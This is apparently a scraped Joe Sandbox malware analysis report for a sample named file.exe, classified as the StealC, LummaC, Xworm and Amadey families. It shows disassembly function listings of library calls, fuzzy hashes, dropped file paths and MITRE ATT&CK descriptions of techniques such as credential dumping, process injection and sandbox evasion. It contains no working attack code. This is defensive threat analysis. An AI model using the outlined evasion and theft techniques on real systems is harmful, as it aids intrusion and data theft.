Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: cd92fab9181123855dee1dddcfb993a6c9e21545b9d278c152eb856a6f05fb33
Instruction ID: 990dda6bd7e33ec198076bc4d2f8453f4ab9e1d7598085f5d91ac9c003960609
Opcode Fuzzy Hash: cd92fab9181123855dee1dddcfb993a6c9e21545b9d278c152eb856a6f05fb33
Instruction Fuzzy Hash: DDF0C8B5A012065BEB009F95DC90A177778FF8529DB258134ED098BB01EB31E816C7E2

Function 6CF9CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CF9CC61
free.MOZGLUE ref: 6CF9CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CF9CC80
free.MOZGLUE(?), ref: 6CF9CC87

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 3f72f5d6d6523ce135a847e8277033f1d4fbc34c493ff9e6529f027480c10b6c
Instruction ID: 278c292c07279796ca445ae2cb5542333c0a958be8fa9ef59df5f8597875a92f
Opcode Fuzzy Hash: 3f72f5d6d6523ce135a847e8277033f1d4fbc34c493ff9e6529f027480c10b6c
Instruction Fuzzy Hash: C1E030767006189BCA10EFA8DC4488677ACEE492703150565E691C3700D631F905CBA1

Function 6CE79DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6CE79E1F

Part of subcall function 6CE313C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CE02352,?,00000000,?,?), ref: 6CE31413
Part of subcall function 6CE313C0: memcpy.VCRUNTIME140(00000000,R#l,00000002,?,?,?,?,6CE02352,?,00000000,?,?), ref: 6CE314C0

Strings

ESCAPE expression must be a single character, xrefs: 6CE79F78
LIKE or GLOB pattern too complex, xrefs: 6CE7A006

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 7bc39963c3e82807b372efcb13f7ea9cc7587837f81869b840c84c31ab4116d7
Instruction ID: 4e599a271fcfbe3c1d842eae627f2d8bf7b4775b2bacc26e2ac403f429da0bf0
Opcode Fuzzy Hash: 7bc39963c3e82807b372efcb13f7ea9cc7587837f81869b840c84c31ab4116d7
Instruction Fuzzy Hash: 1B810871A042514BD724CF39C4813B9B7F2EF4631CF388659D8A48BB85D736D886C7A1

Function 6CED4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CED4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CED4DE6

Strings

%d.%d, xrefs: 6CED4DDE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 0ea42032bf275664aa8ae19ce3cb42309ed068c0d0f1a6d80f96ac093bdfcbfb
Instruction ID: fbe6bd065d833f212438c86b3c3a7d48d4d53e5721c4ac481b37d7aeb1de6368
Opcode Fuzzy Hash: 0ea42032bf275664aa8ae19ce3cb42309ed068c0d0f1a6d80f96ac093bdfcbfb
Instruction Fuzzy Hash: 5131FCB2D002186BEB509FA19C01BFF7778DF55308F160429ED15AB781EB35A906CBE1

Function 6CEF4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8l,00000000,00000000,?,?,6CEF3827,?,00000000), ref: 6CEF4D0A

Part of subcall function 6CEE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6CEF4D22

Part of subcall function 6CEDFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CE81A3E,00000048,00000054), ref: 6CEDFD56

Strings

'8l, xrefs: 6CEF4D07

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8l
API String ID: 1521942269-1867215535
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: a9dec06fc8662189cc148967946309975d6f65be57496ce2f467f8182898714a
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 6EF0683260112857DB104D6A9D4074336FC9B4567DF354272DD38CB791E632DC0286B2

Function 6CF1AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CF1AF78

Part of subcall function 6CE7ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7ACE2
Part of subcall function 6CE7ACC0: malloc.MOZGLUE(00000001), ref: 6CE7ACEC
Part of subcall function 6CE7ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE7AD02
Part of subcall function 6CE7ACC0: TlsGetValue.KERNEL32 ref: 6CE7AD3C
Part of subcall function 6CE7ACC0: calloc.MOZGLUE(00000001,?), ref: 6CE7AD8C
Part of subcall function 6CE7ACC0: PR_Unlock.NSS3 ref: 6CE7ADC0
Part of subcall function 6CE7ACC0: PR_Unlock.NSS3 ref: 6CE7AE8C
Part of subcall function 6CE7ACC0: free.MOZGLUE(?), ref: 6CE7AEAB

memcpy.VCRUNTIME140(6CFE3084,6CFE02AC,00000090), ref: 6CF1AF94

Strings

SSL, xrefs: 6CF1AF73

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 0dfd90a050b26c0fe9113d25418342eea7e7b8862b86f208ccde98a857b8e983
Instruction ID: 31ed2dc99fe468ed8522f80e9a4d7cd5dadc82816bcb987c4a28fd00d78fcb43
Opcode Fuzzy Hash: 0dfd90a050b26c0fe9113d25418342eea7e7b8862b86f208ccde98a857b8e983
Instruction Fuzzy Hash: BE213BF2A29A48FB9AC0DF52A50B3127A71B24E35C7519868C3094BF34D732414C9F92

Function 6CE70F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F1B

Part of subcall function 6CE71370: GetSystemInfo.KERNEL32(?,?,?,?,6CE70936,?,6CE70F20,6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000), ref: 6CE7138F

PR_NewLogModule.NSS3(clock,6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F25

Part of subcall function 6CE71110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CE70936,00000001,00000040), ref: 6CE71130
Part of subcall function 6CE71110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE70936,00000001,00000040), ref: 6CE71142
Part of subcall function 6CE71110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE70936,00000001), ref: 6CE71167

Strings

clock, xrefs: 6CE70F20

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: d2a09d444786232219f87db4a26da11971a9302816a9c30dd4913ae7faa2aaaf
Instruction ID: 1d840ddcf6d5185719b93e177768d8b2d38107c9e299f9bf7383341491a14ce2
Opcode Fuzzy Hash: d2a09d444786232219f87db4a26da11971a9302816a9c30dd4913ae7faa2aaaf
Instruction Fuzzy Hash: B1D02232A0030831C1A0A2D79C88B96B7BCC7C3279F30082AE20C02E400B3684DAD275

Function 6CEE0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CEE0DF5
TlsGetValue.KERNEL32 ref: 6CEE0E2D
TlsGetValue.KERNEL32 ref: 6CEE0E58
TlsGetValue.KERNEL32 ref: 6CEE0E84

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 21ea1d7ec5755de34820f48e21679ca100e5bf9633b93c5f69d62fd94ad3173e
Instruction ID: 32f10e3cbccf28933cce85224ccb57c368bdd41c3a2eaeea1c74c0d52d412b39
Opcode Fuzzy Hash: 21ea1d7ec5755de34820f48e21679ca100e5bf9633b93c5f69d62fd94ad3173e
Instruction Fuzzy Hash: 8D31AEB0A543858BDF90AF78948426977B4BF0E38CF21467DD88887B31EF359085DA91

Function 6CE91EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6CE91ECE
free.MOZGLUE(?), ref: 6CE91EDF
free.MOZGLUE(?), ref: 6CE91EEF
free.MOZGLUE(?), ref: 6CE91EF5

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6b97695c27786e81991e4630759c388cb3cb558d25bb23efe6a0a936b41595b2
Instruction ID: f37d192b227e30f1aa6cf9d5ca181527c7fe1c8473933aaaed334ac957abf205
Opcode Fuzzy Hash: 6b97695c27786e81991e4630759c388cb3cb558d25bb23efe6a0a936b41595b2
Instruction Fuzzy Hash: 54F0E9B57002056BEB00DBA5DC45E27737CEF46198B140434EC0EC3B00DB25F41087A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Xworm

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKJKJEHJJDAKECBFCGIDBGCAEG

C:\ProgramData\EBAKFIIJ

C:\ProgramData\IJDBGDGCGDAKFIDGIDBF

C:\ProgramData\IJKKEHJDHJKFIECAAKFIJJKJKF

C:\ProgramData\JDHCBAEHJJJKKFIDGHJE

C:\ProgramData\JEBKEHJJDAAAAKECBGHD

C:\ProgramData\JJJJEBGD

Windows Analysis Report
file.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

